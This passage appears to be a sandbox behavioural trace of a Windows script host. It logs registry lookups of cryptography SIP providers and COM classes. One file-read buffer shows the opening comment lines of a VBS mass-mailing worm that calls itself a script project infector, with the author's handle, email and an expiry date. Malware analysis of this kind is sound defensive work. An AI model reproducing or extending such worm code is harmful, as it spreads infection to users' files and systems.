MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 5 Handle => 0x000001a4 Name => {C689AAB8-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AAB8-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 6 Handle => 0x000001a4 Name => {C689AAB9-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AAB9-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 7 Handle => 0x000001a4 Name => {C689AABA-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AABA-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 8 Handle => 0x000001a4 Name => {DE351A42-8E59-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {DE351A42-8E59-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 9 Handle => 0x000001a4 Name => {DE351A43-8E59-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {DE351A43-8E59-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 10 Handle => 0x000001a4 Name => {DE351A43-8E59-11D0-8C47-00C04FC295EE} Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x0000019c Name => EncodingType 1 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a0 Registry => 0x0000019c SubKey => EncodingType 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001a0 SubKey => CryptSIPDllPutSignedDataMsg |
FAILURE | 0x00000002 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x0000019c Name => EncodingType 1 Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => PutSignedDataMsg FunctionAddress => 0x7dfab182 ModuleHandle => 0x7dfa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x0000019c Name => EncodingType 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a0 Registry => 0x0000019c SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a4 Registry => 0x000001a0 SubKey => CryptSIPDllGetSignedDataMsg |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x000001a4 Name => {000C10F1-0000-0000-C000-000000000046} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {000C10F1-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 46 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => M\x00S\x00I\x00S\x00I\x00P\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => M\x00s\x00i\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x000001a4 Name => {06C9E010-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {06C9E010-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x000001a4 Name => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 3 Handle => 0x000001a4 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {1A610570-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 4 Handle => 0x000001a4 Name => {9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 5 Handle => 0x000001a4 Name => {C689AAB8-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AAB8-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 6 Handle => 0x000001a4 Name => {C689AAB9-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AAB9-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 7 Handle => 0x000001a4 Name => {C689AABA-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AABA-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 8 Handle => 0x000001a4 Name => {DE351A42-8E59-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {DE351A42-8E59-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumKeyExA |
Index => 9 Handle => 0x000001a4 Name => {DE351A43-8E59-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {DE351A43-8E59-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumKeyExA |
Index => 10 Handle => 0x000001a4 Name => {DE351A43-8E59-11D0-8C47-00C04FC295EE} Class => |
FAILURE | 0x00000103 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x0000019c Name => EncodingType 1 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExA |
Handle => 0x000001a0 Registry => 0x0000019c SubKey => EncodingType 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001a0 SubKey => CryptSIPDllGetSignedDataMsg |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x0000019c Name => EncodingType 1 Class => |
FAILURE | 0x00000103 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetSignedDataMsg FunctionAddress => 0x7dfa1be9 ModuleHandle => 0x7dfa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtQueryInformationFile |
FileHandle => 0x0000019c FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtSetInformationFile |
FileHandle => 0x0000019c FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hotmail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001a0 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW |
Handle => 0x000001a0 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001a0 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW |
Handle => 0x000001a0 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001a2 Registry => 0x000000f2 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001a2 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001a6 Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a2 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001a2 Registry => 0x000001a6 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001aa Registry => 0x000001a2 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW |
Handle => 0x000001aa DataLength => 1000 ValueName => InprocServer32 Type => 1581080 |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001aa |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001a2 SubKey => InprocServerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001a2 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001aa Registry => 0x000001a2 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW |
Handle => 0x000001aa Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00s\x00c\x00r\x00o\x00b\x00j\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001aa |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001a2 SubKey => InprocHandler32 |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001a2 SubKey => InprocHandlerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
